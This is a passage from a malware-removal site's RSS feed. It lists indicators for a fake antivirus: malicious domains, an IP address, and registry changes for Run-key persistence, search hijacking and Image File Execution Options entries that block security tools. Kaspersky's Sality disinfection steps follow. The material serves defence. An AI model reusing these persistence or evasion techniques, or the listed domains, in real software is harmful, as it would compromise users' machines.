<td><span style="color: #ff0000;"><strong>94.228.209.223</strong></span></td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td>
<p><strong><span style="color: #ff0000;"><span><a href="http://update2.keepinsafety.net/" class="broken_link">http://update2.keepinsafety.net/</a></span></span></strong></p>
<p><strong><span style="color: #ff0000;"><span><a href="http://secure2.securexzone.net/" class="broken_link">http://secure2.securexzone.net/</a></span></span></strong></p>
<p><strong><span style="color: #ff0000;"><span><a href="http://secure1.guarded-payment.com/" class="broken_link">http://secure1.guarded-payment.com/</a></span></span></strong></p>
<p><strong><span style="color: #ff0000;"><span><a href="http://report.land-protection.com/" class="broken_link">http://report.land-protection.com/</a></span><br /></span></strong></p>
</td>
<td style="text-align: center;"><strong>-<span style="color: #ff0000;"> </span></strong></td>
</tr>
<tr>
<td>
<p><strong><span style="color: #ff0000;"><span><a href="http://www4.suitcase52td.net" class="broken_link">http://www4.suitcase52td.net</a></span></span></strong></p>
</td>
<td style="text-align: center;"><strong><span id="status_nombre">packupdate_build107_302.exe</span></strong></td>
</tr>
</tbody>
</table>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<h3>Registry Modifications</h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;">The newly created or modified Registry Value is:</p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p><strong>[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]<br />@=&#8221;Implements DocHostUIHandler&#8221;</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]<br />@=&#8221;{3F2BBC05-40DF-11D2-9455-00104BC936FF}&#8221;</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]<br />@=&#8221;Implements DocHostUIHandler&#8221;</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]<br />@=&#8221;C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe&#8221;</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]<br />@=&#8221;MSe5ad.DocHostUIHandler&#8221;</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]</strong></p>
<p><strong>[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]<br /><span>&#8220;URL&#8221;=&#8221;<a href="http://findgala.com/?&amp;uid=2045&amp;q=">http://findgala.com/?&amp;uid=2045&amp;q=</a>{searchTerms}&#8221;</span></strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\3]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]<br />&#8220;IIL&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]<br />&#8220;ltHI&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]<br />&#8220;ltTST&#8221;=dword:0000ba3e</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]<br /><span>&#8220;PRS&#8221;=&#8221;<a href="http://127.0.0.1:27777/?inj=%ORIGINAL%" class="broken_link">http://127.0.0.1:27777/?inj=%ORIGINAL%</a>&#8220;</span></strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]<br />&#8220;MSCompatibilityMode&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]<br />&#8220;Enable&#8221;=dword:00000001</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]<br />&#8220;Size&#8221;=dword:0000000a</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]<br />&#8220;InitHits&#8221;=dword:00000064</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]<br />&#8220;Factor&#8221;=dword:00000014</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\88AA5029C7E29F56EE18C3764A808C2A6CE0BE8E]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]<br />&#8220;HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\cnpxhcqngr_ohvyq106_2045.rkr&#8221;=hex:01,00,00,00,06,00,00,00,c0,57,8f,87,79,ef,ca,01,</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]<br />&#8220;HRZR_EHACVQY:%pfvqy2%\\Zl Frphevgl Ratvar.yax&#8221;=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]<br />&#8220;HRZR_EHACVQY:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Fgneg Zrah\\Zl Frphevgl Ratvar.yax&#8221;=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]<br />&#8220;UID&#8221;=&#8221;2045&#8243;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]<br />&#8220;969903903&#8243;=&#8221;"</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]<br />&#8220;Version/12.02045&#8243;=&#8221;"</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]<br />&#8220;My Security Engine&#8221;=&#8221;\&#8221;C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe\&#8221; /s /d&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\Documents and Settings\\Administrator\\Desktop\\packupdate_build106_2045.exe&#8221;=&#8221;packupdate_build106_2045&#8243;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\taskkill.exe&#8221;=&#8221;Kill Process&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe&#8221;=&#8221;MSe5ad&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\System32\\Wbem\\mofcomp.exe&#8221;=&#8221;mofcomp&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\netsh.exe&#8221;=&#8221;Network Command Shell&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\cmd.exe&#8221;=&#8221;Windows Command Processor&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\Documents and Settings\\Administrator\\Application Data\\My Security Engine\\winupdate.exe&#8221;=&#8221;winupdate&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]<br />&#8220;C:\\WINDOWS\\system32\\ntvdm.exe&#8221;=&#8221;NTVDM.EXE&#8221;</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]</strong></p>
<p><strong>[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]<br /><span>&#8220;URL&#8221;=&#8221;<a href="http://findgala.com/?&amp;uid=2045&amp;q=">http://findgala.com/?&amp;uid=2045&amp;q=</a>{searchTerms}&#8221;</span></strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]<br />@=&#8221;Implements DocHostUIHandler&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]<br />@=&#8221;{3F2BBC05-40DF-11D2-9455-00104BC936FF}&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]<br />@=&#8221;Implements DocHostUIHandler&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]<br />@=&#8221;C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]<br />@=&#8221;MSe5ad.DocHostUIHandler&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]<br />&#8220;EnableFileTracing&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]<br />&#8220;EnableConsoleTracing&#8221;=dword:00000000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]<br />&#8220;FileTracingMask&#8221;=dword:ffff0000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]<br />&#8220;ConsoleTracingMask&#8221;=dword:ffff0000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]<br />&#8220;MaxFileSize&#8221;=dword:00100000</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]<br />&#8220;FileDirectory&#8221;=hex(2):25,77,69,6e,64,69,72,25,5c,74,72,61,63,69,6e,67,00,</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]</strong></p>
<p><strong>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]<br />&#8220;Debugger&#8221;=&#8221;svchost.exe&#8221;<br />.</strong></p>
<p><strong>.</strong></p>
<p><strong>.</strong></p>
<p><strong>etc.</strong></p>
<p><strong><br /></strong></p>
<p><strong> </strong></p>
<p> </p>
<ul>
<strong><br /></strong>
</ul>
<p> </p>
<h3 style="border: 0px none ; margin: 0px; padding: 0px;"><strong>Removal Tools :</strong></h3>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong><br /></strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong>1 &#8211; Download the free version of Malwarebytes that provided by <span style="color: #ff0000;">www.malwarebytes.org</span> from <a title="Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an Removal" href="http://www.malwarebytes.org/mbam-download.php" target="_blank">Here</a>. </strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong>2 &#8211; Download <span style="color: #ff0000;">MicrosoftFixit50267.msi</span> to fix hosts file from <a href="http://go.microsoft.com/?linkid=9668866" target="_blank">Here</a>.</strong></p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"> </p>
<p style="border: 0px none ; margin: 0px; padding: 0px;"><strong><br /></strong></p>
<p> </p>
<div style="font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>For any help contact us.</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong>VirusExperts.org TEAM</strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /></strong></span></div>
<div style="color: #b45f06; font-family: Verdana,sans-serif;"><span style="color: #000000;"><strong><br /></strong></span></div>
<div id="_mcePaste" style="overflow: hidden; position: absolute; width: 1px; height: 1px; top: 741px; left: -10000px;">%Temp%\cvasds0.dll <br />%Temp%\cvasds1.dll <br />%Temp%\cvasds2.dll</div>


<br /><h3><p>Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-co-downloader-cew-vvavia-exe-vdl-exe-vdk-exe-vdj-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware'>Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-suspect-1be4800a5bf6f6-malfakeav-bw-ave-exe-malware/' rel='bookmark' title='Permanent Link: Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware'>Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-w32vbsauto-c-vbsslogod-x-startup-scr-winxp-exe-winjpg-jpg-m-p-jpg-worm/' rel='bookmark' title='Permanent Link: Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM'>Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.virusexperts.org/removal-tips-tools-and-videos/removal-tool-for-malfakeav-bw-generic-fakealerthr-packed-win32-krap-an-winupdate-exe-exec-exe-ppal-exe-mse5ad-exe-malware/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools</title>
		<link>http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-and-fix-virus-win32-sality-win32sality-ah-win32sality-ag-with-kaspersky-tools/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=how-to-remove-and-fix-virus-win32-sality-win32sality-ah-win32sality-ag-with-kaspersky-tools</link>
		<comments>http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-and-fix-virus-win32-sality-win32sality-ah-win32sality-ag-with-kaspersky-tools/#comments</comments>
		<pubDate>Mon, 19 Apr 2010 21:03:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Removal Tips,Tools and Videos]]></category>
		<category><![CDATA[disinfection]]></category>
		<category><![CDATA[fix]]></category>
		<category><![CDATA[SafebootVista]]></category>
		<category><![CDATA[SafeBootWinServer]]></category>
		<category><![CDATA[SafeBootWinXP]]></category>
		<category><![CDATA[Sality]]></category>
		<category><![CDATA[SalityKiller]]></category>
		<category><![CDATA[Virus.Win32.Sality.aa]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.virusexperts.org/?p=2408</guid>
		<description><![CDATA[The recommendations given concerning disinfection of a computer from Virus.Win32.Sality should be applied only if NO Kaspersky Lab product is installed on an infected computer, and/ or if the computer is already infected and a Kaspersky Lab product cannot be installed by regular means. Kaspersky Lab experts also recommend using Rescue Disk to disinfect an [...]

<h3>
Related posts:</h3><ol><li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/how-to-remove-viruswin32salityaa-win32salityam-w32salityah/' rel='bookmark' title='Permanent Link: How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah'>How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah</a></li>
<li><a href='http://www.virusexperts.org/security-news/new-sality-virus-in-sight-viruswin32salityaa-win32salityam-w32salityah/' rel='bookmark' title='Permanent Link: New Sality Virus In Sight ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah )'>New Sality Virus In Sight ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah )</a></li>
<li><a href='http://www.virusexperts.org/removal-tips-tools-and-videos/fix-exe-extension-for-viruswin32salityaa-win32salityam-w32salityah-infected-pc/' rel='bookmark' title='Permanent Link: Fix .exe extension for ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah ) infected PC'>Fix .exe extension for ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah ) infected PC</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">The recommendations given concerning disinfection of a computer from <strong>Virus.Win32.Sality</strong> should be applied only if <strong><em>NO</em> Kaspersky Lab</strong> product is installed on an infected computer, and/ or if the computer is already infected and a <strong>Kaspersky Lab</strong> product cannot be installed by regular means. <strong>Kaspersky Lab</strong> experts also recommend using <strong>Rescue</strong> <strong>Disk</strong> to disinfect an infected computer.</p>
<p> </p>
<p>The <strong>SalityKiller.exe</strong> utility given in this article allows detecting and disinfecting only the following <strong>Sality</strong> modification <strong>Virus.Win32.Sality.aa, Virus.Win32.Sality.ag. </strong></p>
<p><strong><br /></strong></p>
<p>In order to disinfect a computer from <strong>Virus.Win32.Sality.aa,</strong> do the following:</p>
<p> </p>
<p><strong><em>If infected computers are in the local network under domain control: </em></strong></p>
<p><em><strong>Step 1</strong>. Preparation to disinfection</em>:</p>
<ul>
<li>Download the file <strong><em><a onclick="trackFile(this, 'salitykiller.zip');" href="http://support.kaspersky.com/downloads/utils/salitykiller.zip">SalityKiller.zip</a></em></strong></li>
<li>Unpack the file <strong>SalityKiller.zip</strong></li>
<li>Run the file <strong>SalityKiller.exe</strong> on each computer in turn (for example, through <strong>Kaspersky Administration Kit</strong>, or the server group policy).
<ul>
<li>on all computers on which the domain administrator can register and work </li>
</ul>
</li>
</ul>
<blockquote dir="ltr">
<blockquote dir="ltr">
<p><span style="color: red;">While disinfecting this group of the computers do not log on under domain administrator on any other computers to prevent further spread of the infection in the network. </span></p>
</blockquote>
</blockquote>
<ul>
<li>
<ul>
<li>on all other computers </li>
</ul>
</li>
</ul>
<p><span style="color: red;">Do not stop or terminate work of the utility until all computers in the network have been disinfected. </span></p>
<p><span style="color: red;"><br /></span></p>
<p> </p>
<p><em><strong>Step 2</strong>. Algorithm of computer disinfection.</em></p>
<p><em><br /></em></p>
<p>Computers on which you log on under a domain administrator rights should be disinfected first. Once these computers are disinfected, start disinfecting other computers in the network.</p>
<ul>
<li>Run the utility S<strong>alityKiller.exe</strong> on the infected computers once again (no additional commands to run the utility are needed). </li>
<li style="text-align: justify;">Make sure the anti-virus icon in the tray has turned red thus indicating the anti-virus software is fully functional. If otherwise, reinstall the anti-virus via <strong>Kaspersky Administration Kit.</strong> </li>
<li>Update the anti-virus databases (signature threats) for the <strong>Kaspersky Lab’s</strong> product installed on your PC. If you cannot download the updates from the Internet, update from the zip-archives. 
<ul>
<li><strong><span style="text-decoration: underline;"><a href="http://support.kaspersky.com/faq/?qid=193238849">how to update Kaspersky Lab’s products version 5.0 from the zip archives. </a></span></strong></li>
<li><strong><span style="text-decoration: underline;"><a href="http://support.kaspersky.com/faq/?qid=208279232">how to update Kaspersky Lab’s products version 6.0 from the zip archives </a></span></strong></li>
<li><strong><span style="text-decoration: underline;"><a href="http://support.kaspersky.com/faq/?qid=208279442">how to update Kaspersky Lab’s products version 7.0 from the zip archives</a></span></strong> </li>
</ul>
</li>
<li>set the full scan options to their <a href="http://support.kaspersky.com/faq/?qid=208279711"><strong>maximum scan level</strong></a> </li>
<li>run full computer scan </li>
</ul>
<p><em><strong>Step 3</strong>. Signs of a disinfected/ clean computer</em></p>
<ul>
<li>Kaspersky Anti-Virus is running and works in normal mode </li>
<li>full computer scan does not detect infected objects on the computer </li>
</ul>
<p><em><strong>Step 4</strong>. Cleaning the registry of infected computers in the domain network:</em></p>
<ul>
<li>download the file <strong><span style="text-decoration: underline;"><a onclick="trackFile(this, 'sality_regkeys.zip');" href="http://support.kaspersky.com/downloads/utils/sality_regkeys.zip"><em>Sality_RegKeys.zip</em></a></span></strong></li>
<li>unpack the file <strong>Sality_RegKeys.zip</strong> </li>
<li>run the file <strong>Disable_autorun.reg</strong> from the archive<strong> Sality_RegKeys.zip</strong>
<p>You can also disable autorun from all devices by running the <strong>SalityKiller</strong> utility with parameter <strong>-a</strong>.</li>
<li>Click <strong>Yes</strong> to confirm adding the information to the registry </li>
</ul>
<blockquote dir="ltr">
<p><img src="http://www.virusexperts.org/wp-content/uploads/HLIC/13338b08639c6cd439546c11c45f51e7.jpg" border="0" alt="" width="514" height="116" /></p>
</blockquote>
<ul>
<li>once the scan is over, from the archive <strong>Sality_RegKeys.zip</strong> run the file of the registry key: 
<ul>
<li>under <strong>Windows 2000</strong> run the registry file <strong>SafeBootWin200.reg</strong> </li>
<li>under <strong>Windows XP</strong> run the registry file <strong>SafeBootWinXP.reg</strong> </li>
<li>under <strong>Windows 2003</strong> run the registry file <strong>SafeBootWinServer2003.reg</strong> </li>
<li>under <strong>Windows Vista</strong> run the registry file <strong>SafebootVista.reg</strong> </li>
</ul>
</li>
</ul>
<p> </p>
<p><strong><em>If infected computer are not in the network</em></strong></p>
<ul>
<li>Disable the technologies<em> <strong><span style="text-decoration: underline;"><a href="http://support.kaspersky.com/faq/?qid=193239261">iSwift and iChecker</a></span></strong></em>, if one of the following products is installed and running on your PC:
<ul>
<li><strong>Kaspersky Anti-Virus 7.0 </strong></li>
<li><strong>Kaspersky Internet Security 7.0 </strong></li>
<li><strong>Kaspersky Anti-Virus 6.0 </strong></li>
<li><strong>Kaspersky Internet Security 6.0 </strong></li>
<li><strong>Kaspersky Anti-Virus  2009;</strong></li>
<li><strong>Kaspersky Internet Security 2009;</strong></li>
<li><strong>Kaspersky Anti-Virus  2010;</strong></li>
<li><strong>Kaspersky Internet Security 2010;</strong></li>
<li><strong>Kaspersky Anti-Virus 6.0 for Windows Workstations </strong></li>
<li><strong>Kaspersky Anti-Virus 6.0 SOS </strong></li>
<li><strong>Kaspersky Anti-Virus 6.0 for Windows Servers </strong></li>
</ul>
</li>
<li>Download and unpack the file <strong><em><a onclick="trackFile(this, 'salitykiller.zip');" href="http://support.kaspersky.com/downloads/utils/salitykiller.zip">SalityKiller.zip</a></em></strong></li>
<li>Run the file <strong>SalityKiller.exe</strong> </li>
</ul>
<blockquote dir="ltr">
<p>With an installed <strong>Kaspersky Lab</strong> product you might be prompted to allow any activity to the process <strong>Sality_killer.exe</strong></p>
</blockquote>
<ul dir="ltr">
<li>
<ul>
<li>
<div>Go to <strong>Start &gt; All programs</strong> &gt; right-click <strong>Startup</strong> &gt; select <strong>Open</strong></div>
</li>
</ul>
</li>
</ul>
<blockquote dir="ltr">
<p><img src="http://www.virusexperts.org/wp-content/uploads/HLIC/528ead3b9eb76015347943bfd5f6fe69.jpg" border="0" alt="" width="446" height="395" /></p>
</blockquote>
<p> </p>
<ul dir="ltr">
<li>
<ul>
<li>
<div>Right-click any place in the <strong>Startup</strong> folder</div>
</li>
<li>
<div>In the menu select <strong>New &gt; Shortcut</strong></div>
</li>
<li>
<div>In the <strong>Create Shortcut</strong> window click <strong>Browse</strong></div>
</li>
<li>
<div>Browse the folder into which the file <strong>SalityKiller.exe</strong> was unpacked</div>
</li>
<li>
<div>Highlight the file <strong>SalityKiller.exe</strong></div>
</li>
<li>
<div>Click the <strong>OK</strong> button</div>
</li>
<li>Click <strong>Next</strong> </li>
<li>
